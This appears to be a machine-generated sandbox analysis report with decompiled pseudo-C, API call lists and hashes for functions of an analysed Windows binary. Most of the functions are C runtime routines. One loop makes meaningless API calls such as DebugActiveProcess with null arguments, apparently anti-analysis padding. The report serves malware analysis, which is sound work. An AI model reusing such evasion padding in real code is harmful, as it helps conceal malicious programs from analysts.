                                                            0x00402771
                                                            0x0040277a
                                                            0x00402784
                                                            0x0040278c
                                                            0x00402799
                                                            0x0040279b
                                                            0x0040279b
                                                            0x004027a4
                                                            0x004027b1
                                                            0x004027b6
                                                            0x004027bd
                                                            0x004027bd
                                                            0x004027c3
                                                            0x004027c6
                                                            0x004027cd
                                                            0x004027d4
                                                            0x004027e2
                                                            0x004027e8
                                                            0x004027f3
                                                            0x004027fd
                                                            0x00402803
                                                            0x00402809
                                                            0x0040280c
                                                            0x00402815
                                                            0x00402818
                                                            0x0040281f
                                                            0x0040281f
                                                            0x0040281f
                                                            0x00402828
                                                            0x0040282b
                                                            0x0040282f
                                                            0x00402833

                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00402753
                                                            • GetTickCount.KERNEL32 ref: 0040279B
                                                            • OpenFileMappingW.KERNEL32(00000000,00000000,00000000), ref: 004027B6
                                                            • DeleteVolumeMountPointA.KERNEL32 ref: 004027BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: CountDeleteExchangeFileInterlockedMappingMountOpenPointTickVolume
                                                            • String ID:
                                                            • API String ID: 4198633837-3916222277
                                                            • Opcode ID: f1baafe37fb114b34cf2db6e8d7d216c982362aab3838881553a7f2aa427828d
                                                            • Instruction ID: 32a452b67ac6fd04f6c0b9076d9007fd3c0f175497edcd9ca651c8aa7d5f17a7
                                                            • Opcode Fuzzy Hash: f1baafe37fb114b34cf2db6e8d7d216c982362aab3838881553a7f2aa427828d
                                                            • Instruction Fuzzy Hash: E241AEB1E01219EFCB40DFA9DA89A9EBBF4FB08314F50846AE415F3250D378AA45CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E00408724(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _t15;
                                                            				LONG* _t21;
                                                            				long _t23;
                                                            				void* _t29;
                                                            				void* _t31;
                                                            				LONG* _t33;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            
                                                            				_t35 = __eflags;
                                                            				_t29 = __edx;
                                                            				_t25 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x40ffd8);
                                                            				E0040487C(__ebx, __edi, __esi);
                                                            				_t31 = E004063F0(__ebx, _t35);
                                                            				_t15 =  *0x411dcc; // 0xfffffffe
                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                            					E00406842(_t25, _t29, _t31, 0xd);
                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                            					_t33 =  *(_t31 + 0x68);
                                                            					 *(_t34 - 0x1c) = _t33;
                                                            					__eflags = _t33 -  *0x411cd0; // 0x5d1860
                                                            					if(__eflags != 0) {
                                                            						__eflags = _t33;
                                                            						if(_t33 != 0) {
                                                            							_t23 = InterlockedDecrement(_t33);
                                                            							__eflags = _t23;
                                                            							if(_t23 == 0) {
                                                            								__eflags = _t33 - 0x4118a8;
                                                            								if(__eflags != 0) {
                                                            									_push(_t33);
                                                            									E004081A8(_t25, _t29, _t31, _t33, __eflags);
                                                            								}
                                                            							}
                                                            						}
                                                            						_t21 =  *0x411cd0; // 0x5d1860
                                                            						 *(_t31 + 0x68) = _t21;
                                                            						_t33 =  *0x411cd0; // 0x5d1860
                                                            						 *(_t34 - 0x1c) = _t33;
                                                            						InterlockedIncrement(_t33);
                                                            					}
                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                            					E004087BF();
                                                            				} else {
                                                            					_t33 =  *(_t31 + 0x68);
                                                            				}
                                                            				if(_t33 == 0) {
                                                            					E00403B50(0x20);
                                                            				}
                                                            				return E004048C1(_t33);
                                                            			}











                                                            0x00408724
                                                            0x00408724
                                                            0x00408724
                                                            0x00408724
                                                            0x00408726
                                                            0x0040872b
                                                            0x00408735
                                                            0x00408737
                                                            0x0040873f
                                                            0x00408760
                                                            0x00408766
                                                            0x0040876a
                                                            0x0040876d
                                                            0x00408770
                                                            0x00408776
                                                            0x00408778
                                                            0x0040877a
                                                            0x0040877d
                                                            0x00408783
                                                            0x00408785
                                                            0x00408787
                                                            0x0040878d
                                                            0x0040878f
                                                            0x00408790
                                                            0x00408795
                                                            0x0040878d
                                                            0x00408785
                                                            0x00408796
                                                            0x0040879b
                                                            0x0040879e
                                                            0x004087a4
                                                            0x004087a8
                                                            0x004087a8
                                                            0x004087ae
                                                            0x004087b5
                                                            0x00408747
                                                            0x00408747
                                                            0x00408747
                                                            0x0040874c
                                                            0x00408750
                                                            0x00408755
                                                            0x0040875d

                                                            APIs
                                                            • __getptd.LIBCMT ref: 00408730
                                                              • Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
                                                              • Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400
                                                            • __amsg_exit.LIBCMT ref: 00408750
                                                            • __lock.LIBCMT ref: 00408760
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040877D
                                                            • InterlockedIncrement.KERNEL32(005D1860), ref: 004087A8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                            • String ID:
                                                            • API String ID: 4271482742-0
                                                            • Opcode ID: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
                                                            • Instruction ID: 3afbc463ed8f73c63c96e670660ec91d28aa376d58571e4cd45f615bcc75b0f2
                                                            • Opcode Fuzzy Hash: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
                                                            • Instruction Fuzzy Hash: A2018B329406119BCB20BB2A9E4578A7360BB00794F20813FE984776E5CF3CA941CBDD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 41%
                                                            			E004081A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				intOrPtr* _t10;
                                                            				intOrPtr _t13;
                                                            				intOrPtr _t24;
                                                            				void* _t26;
                                                            
                                                            				_push(0xc);
                                                            				_push(0x40ff70);
                                                            				_t8 = E0040487C(__ebx, __edi, __esi);
                                                            				_t24 =  *((intOrPtr*)(_t26 + 8));
                                                            				if(_t24 == 0) {
                                                            					L9:
                                                            					return E004048C1(_t8);
                                                            				}
                                                            				if( *0x42e3b0 != 3) {
                                                            					_push(_t24);
                                                            					L7:
                                                            					if(HeapFree( *0x42cc54, 0, ??) == 0) {
                                                            						_t10 = E00404382();
                                                            						 *_t10 = E00404340(GetLastError());
                                                            					}
                                                            					goto L9;
                                                            				}
                                                            				E00406842(__ebx, __edx, __edi, 4);
                                                            				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                            				_t13 = E00407605(_t24);
                                                            				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                                                            				if(_t13 != 0) {
                                                            					_push(_t24);
                                                            					_push(_t13);
                                                            					E00407635();
                                                            				}
                                                            				 *(_t26 - 4) = 0xfffffffe;
                                                            				_t8 = E004081FE();
                                                            				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                                                            					goto L9;
                                                            				} else {
                                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                                            					goto L7;
                                                            				}
                                                            			}







                                                            0x004081a8
                                                            0x004081aa
                                                            0x004081af
                                                            0x004081b4
                                                            0x004081b9
                                                            0x00408230
                                                            0x00408235
                                                            0x00408235
                                                            0x004081c2
                                                            0x00408207
                                                            0x00408208
                                                            0x00408218
                                                            0x0040821a
                                                            0x0040822d
                                                            0x0040822f
                                                            0x00000000
                                                            0x00408218
                                                            0x004081c6
                                                            0x004081cc
                                                            0x004081d1
                                                            0x004081d7
                                                            0x004081dc
                                                            0x004081de
                                                            0x004081df
                                                            0x004081e0
                                                            0x004081e6
                                                            0x004081e7
                                                            0x004081ee
                                                            0x004081f7
                                                            0x00000000
                                                            0x004081f9
                                                            0x004081f9
                                                            0x00000000
                                                            0x004081f9

                                                            APIs
                                                            • __lock.LIBCMT ref: 004081C6
                                                              • Part of subcall function 00406842: __mtinitlocknum.LIBCMT ref: 00406858
                                                              • Part of subcall function 00406842: __amsg_exit.LIBCMT ref: 00406864
                                                              • Part of subcall function 00406842: EnterCriticalSection.KERNEL32(?,?,?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001), ref: 0040686C
                                                            • ___sbh_find_block.LIBCMT ref: 004081D1
                                                            • ___sbh_free_block.LIBCMT ref: 004081E0
                                                            • HeapFree.KERNEL32(00000000,?,0040FF70,0000000C,00406823,00000000,0040FEB0,0000000C,0040685D,?,?,?,0040444C,00000004,0040FE20,0000000C), ref: 00408210
                                                            • GetLastError.KERNEL32(?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001,00000214), ref: 00408221
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2714421763-0
                                                            • Opcode ID: 7a126fb7e77c07508bd506e97cbe44db53b9e5c242550ccc81087664f5ad3045
                                                            • Instruction ID: 507807e596971028d1e4889de8fb89a06dd67e1d82edd46d0edb05ec1324151a
                                                            • Opcode Fuzzy Hash: 7a126fb7e77c07508bd506e97cbe44db53b9e5c242550ccc81087664f5ad3045
                                                            • Instruction Fuzzy Hash: E101D671905B01AADB207BB29D06B5F3B64AF00368F10457FF5857A1D2CF3C95418AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E00409E57() {
                                                            				signed long long _v12;
                                                            				signed int _v20;
                                                            				signed long long _v28;
                                                            				signed char _t8;
                                                            
                                                            				_t8 = GetModuleHandleA("KERNEL32");
                                                            				if(_t8 == 0) {
                                                            					L6:
                                                            					_v20 =  *0x4019f8;
                                                            					_v28 =  *0x4019f0;
                                                            					asm("fsubr qword [ebp-0x18]");
                                                            					_v12 = _v28 / _v20 * _v20;
                                                            					asm("fld1");
                                                            					asm("fcomp qword [ebp-0x8]");
                                                            					asm("fnstsw ax");
                                                            					if((_t8 & 0x00000005) != 0) {
                                                            						return 0;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				} else {
                                                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                            					if(__eax == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_push(0);
                                                            						return __eax;
                                                            					}
                                                            				}
                                                            			}







                                                            0x00409e5c
                                                            0x00409e64
                                                            0x00409e7b
                                                            0x00409e27
                                                            0x00409e30
                                                            0x00409e3c
                                                            0x00409e3f
                                                            0x00409e42
                                                            0x00409e44
                                                            0x00409e47
                                                            0x00409e4c
                                                            0x00409e56
                                                            0x00409e4e
                                                            0x00409e52
                                                            0x00409e52
                                                            0x00409e66
                                                            0x00409e6c
                                                            0x00409e74
                                                            0x00000000
                                                            0x00409e76
                                                            0x00409e76
                                                            0x00409e7a
                                                            0x00409e7a
                                                            0x00409e74

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00404ADC), ref: 00409E5C
                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00409E6C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                            • API String ID: 1646373207-3105848591
                                                            • Opcode ID: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
                                                            • Instruction ID: e51290182a2e1e9a96986d294ad1c7ef0f1965be230ab9cad6a7acab8c16fd01
                                                            • Opcode Fuzzy Hash: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
                                                            • Instruction Fuzzy Hash: B2F0367064050EE2DF005BB1FD1976F7A74BB80785F5505B1E1D2B00D9DF348871D68A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00408F9B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				char _v20;
                                                            				signed int _t54;
                                                            				intOrPtr _t56;
                                                            				int _t57;
                                                            				int _t58;
                                                            				signed short* _t59;
                                                            				short* _t60;
                                                            				int _t65;
                                                            				char* _t72;
                                                            
                                                            				_t72 = _a8;
                                                            				if(_t72 == 0 || _a12 == 0) {
                                                            					L5:
                                                            					return 0;
                                                            				} else {
                                                            					if( *_t72 != 0) {
                                                            						E00404698( &_v20, _a16);
                                                            						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                                                            							if(E004090CC( *_t72 & 0x000000ff,  &_v20) == 0) {
                                                            								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                                            									L10:
                                                            									if(_v8 != 0) {
                                                            										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                            									}
                                                            									return 1;
                                                            								}
                                                            								L21:
                                                            								_t54 = E00404382();
                                                            								 *_t54 = 0x2a;
                                                            								if(_v8 != 0) {
                                                            									_t54 = _v12;
                                                            									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                                                            								}
                                                            								return _t54 | 0xffffffff;
                                                            							}
                                                            							_t56 = _v20;
                                                            							_t65 =  *(_t56 + 0xac);
                                                            							if(_t65 <= 1 || _a12 < _t65) {
                                                            								L17:
                                                            								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                                                            									goto L21;
                                                            								} else {
                                                            									goto L19;
                                                            								}
                                                            							} else {
                                                            								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                            								_t56 = _v20;
                                                            								if(_t58 != 0) {
                                                            									L19:
                                                            									_t57 =  *(_t56 + 0xac);
                                                            									if(_v8 == 0) {
                                                            										return _t57;
                                                            									}
                                                            									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                            									return _t57;
                                                            								}
                                                            								goto L17;
                                                            							}
                                                            						}
                                                            						_t59 = _a4;
                                                            						if(_t59 != 0) {
                                                            							 *_t59 =  *_t72 & 0x000000ff;
                                                            						}
                                                            						goto L10;
                                                            					} else {
                                                            						_t60 = _a4;
                                                            						if(_t60 != 0) {
                                                            							 *_t60 = 0;
                                                            						}
                                                            						goto L5;
                                                            					}
                                                            				}
                                                            			}














                                                            0x00408fa5
                                                            0x00408fac
                                                            0x00408fc3
                                                            0x00000000
                                                            0x00408fb3
                                                            0x00408fb5
                                                            0x00408fcf
                                                            0x00408fda
                                                            0x0040900c
                                                            0x004090aa
                                                            0x00408fea
                                                            0x00408fed
                                                            0x00408ff2
                                                            0x00408ff2
                                                            0x00000000
                                                            0x00408ff8
                                                            0x0040906c
                                                            0x0040906c
                                                            0x00409071
                                                            0x0040907a
                                                            0x0040907c
                                                            0x0040907f
                                                            0x0040907f
                                                            0x00000000
                                                            0x00409083
                                                            0x0040900e
                                                            0x00409011
                                                            0x0040901a
                                                            0x00409041
                                                            0x0040904a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00409021
                                                            0x00409034
                                                            0x0040903c
                                                            0x0040903f
                                                            0x00409051
                                                            0x00409051
                                                            0x0040905a
                                                            0x00408fc8
                                                            0x00408fc8
                                                            0x00409063
                                                            0x00000000
                                                            0x00409063
                                                            0x00000000
                                                            0x0040903f
                                                            0x0040901a
                                                            0x00408fdc
                                                            0x00408fe1
                                                            0x00408fe7
                                                            0x00408fe7
                                                            0x00000000
                                                            0x00408fb7
                                                            0x00408fb7
                                                            0x00408fbc
                                                            0x00408fc0
                                                            0x00408fc0
                                                            0x00000000
                                                            0x00408fbc
                                                            0x00408fb5

                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408FCF
                                                            • __isleadbyte_l.LIBCMT ref: 00409003
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00409034
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 004090A2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
                                                            • Instruction ID: a72e1e6b92dd8046c8415602afada28cf0afd50c9d618631ceac23c624d3e928
                                                            • Opcode Fuzzy Hash: e425fc12a51c5a5de07dbfe9a4c054cba0ea8bc6ba5236abac099db2dbbd81cf
                                                            • Instruction Fuzzy Hash: A831AE31A10256EFDB20DF74C9809AB7BA6BF01310B15857EE5A1AB2D2DB34DD80DB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00409D43(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                            				intOrPtr _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            
                                                            				_t25 = _a16;
                                                            				if(_t25 == 0x65 || _t25 == 0x45) {
                                                            					_t26 = E00409634(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            					goto L9;
                                                            				} else {
                                                            					_t34 = _t25 - 0x66;
                                                            					if(_t25 != 0x66) {
                                                            						__eflags = _t25 - 0x61;
                                                            						if(_t25 == 0x61) {
                                                            							L7:
                                                            							_t26 = E00409724(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            						} else {
                                                            							__eflags = _t25 - 0x41;
                                                            							if(__eflags == 0) {
                                                            								goto L7;
                                                            							} else {
                                                            								_t26 = E00409C49(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                            							}
                                                            						}
                                                            						L9:
                                                            						return _t26;
                                                            					} else {
                                                            						return E00409B8E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                            					}
                                                            				}
                                                            			}






                                                            0x00409d48
                                                            0x00409d4e
                                                            0x00409dc1
                                                            0x00000000
                                                            0x00409d55
                                                            0x00409d55
                                                            0x00409d58
                                                            0x00409d73
                                                            0x00409d76
                                                            0x00409d96
                                                            0x00409da8
                                                            0x00409d78
                                                            0x00409d78
                                                            0x00409d7b
                                                            0x00000000
                                                            0x00409d7d
                                                            0x00409d8f
                                                            0x00409d8f
                                                            0x00409d7b
                                                            0x00409dc6
                                                            0x00409dca
                                                            0x00409d5a
                                                            0x00409d72
                                                            0x00409d72
                                                            0x00409d58

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                            • Instruction ID: 7aaf76d984b8bee9c108c0065b9737c736a60a61fa3666d8c25626394b4aeabb
                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                            • Instruction Fuzzy Hash: D511833244014EBBCF125F85DC41CEE3F62BF59394F588426FA1869172C63BC972AB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402834() {
                                                            				long _v8;
                                                            				char _v1032;
                                                            				void* __edi;
                                                            				unsigned int _t4;
                                                            				unsigned int _t12;
                                                            				unsigned int* _t14;
                                                            				unsigned int* _t16;
                                                            
                                                            				_t14 =  *0x42e148;
                                                            				_t4 =  *0x42e384 >> 3;
                                                            				if(_t4 > 0) {
                                                            					_t16 = _t14;
                                                            					_t12 = _t4;
                                                            					do {
                                                            						_t24 =  *0x42e384 - 0x959;
                                                            						if( *0x42e384 == 0x959) {
                                                            							GetProcessWorkingSetSize(0, 0, 0);
                                                            							WriteConsoleW(0, 0, 0,  &_v8, 0);
                                                            							LCMapStringA(0, 0, 0, 0,  &_v1032, 0);
                                                            							DebugActiveProcess(0);
                                                            						}
                                                            						_t4 = E004026CF(_t16, _t24);
                                                            						_t16 = _t16 + 8;
                                                            						_t12 = _t12 - 1;
                                                            					} while (_t12 != 0);
                                                            				}
                                                            				return _t4;
                                                            			}










                                                            0x0040283c
                                                            0x00402849
                                                            0x00402850
                                                            0x00402854
                                                            0x00402856
                                                            0x00402858
                                                            0x00402858
                                                            0x00402862
                                                            0x00402867
                                                            0x00402875
                                                            0x00402887
                                                            0x0040288e
                                                            0x0040288e
                                                            0x00402894
                                                            0x00402899
                                                            0x0040289c
                                                            0x0040289c
                                                            0x004028a0
                                                            0x004028a3

                                                            APIs
                                                            • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00402867
                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402875
                                                            • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00402887
                                                            • DebugActiveProcess.KERNEL32(00000000), ref: 0040288E
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: Process$ActiveConsoleDebugSizeStringWorkingWrite
                                                            • String ID:
                                                            • API String ID: 4204620807-0
                                                            • Opcode ID: 0a6034e446cd9f43c3f665b496e46f4f24d3037a1f746c4fdf4176757d5961b2
                                                            • Instruction ID: ece515c153ed40cf5fb097a15ab51fb78e94f721d907a4b70b6bd4020438fc31
                                                            • Opcode Fuzzy Hash: 0a6034e446cd9f43c3f665b496e46f4f24d3037a1f746c4fdf4176757d5961b2
                                                            • Instruction Fuzzy Hash: 18F0AF721020387BD320B756AE4CCEB7F6CEF463A5B000136F609E25A0D6744942C6FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00408E90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _t13;
                                                            				void* _t25;
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t29;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            
                                                            				_t31 = __eflags;
                                                            				_t26 = __edi;
                                                            				_t25 = __edx;
                                                            				_t22 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x410018);
                                                            				E0040487C(__ebx, __edi, __esi);
                                                            				_t29 = E004063F0(__ebx, _t31);
                                                            				_t13 =  *0x411dcc; // 0xfffffffe
                                                            				if(( *(_t29 + 0x70) & _t13) == 0) {
                                                            					L6:
                                                            					E00406842(_t22, _t25, _t26, 0xc);
                                                            					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                            					_t8 = _t29 + 0x6c; // 0x6c
                                                            					_t27 =  *0x411eb0; // 0x411dd8
                                                            					 *((intOrPtr*)(_t30 - 0x1c)) = E00408E52(_t8, _t25, _t27);
                                                            					 *(_t30 - 4) = 0xfffffffe;
                                                            					E00408EFA();
                                                            				} else {
                                                            					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                                                            					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_t29 =  *((intOrPtr*)(E004063F0(_t22, _t33) + 0x6c));
                                                            					}
                                                            				}
                                                            				if(_t29 == 0) {
                                                            					E00403B50(0x20);
                                                            				}
                                                            				return E004048C1(_t29);
                                                            			}









                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e90
                                                            0x00408e92
                                                            0x00408e97
                                                            0x00408ea1
                                                            0x00408ea3
                                                            0x00408eab
                                                            0x00408ecf
                                                            0x00408ed1
                                                            0x00408ed7
                                                            0x00408edb
                                                            0x00408ede
                                                            0x00408ee9
                                                            0x00408eec
                                                            0x00408ef3
                                                            0x00408ead
                                                            0x00408ead
                                                            0x00408eb1
                                                            0x00000000
                                                            0x00408eb3
                                                            0x00408eb8
                                                            0x00408eb8
                                                            0x00408eb1
                                                            0x00408ebd
                                                            0x00408ec1
                                                            0x00408ec6
                                                            0x00408ece

                                                            APIs
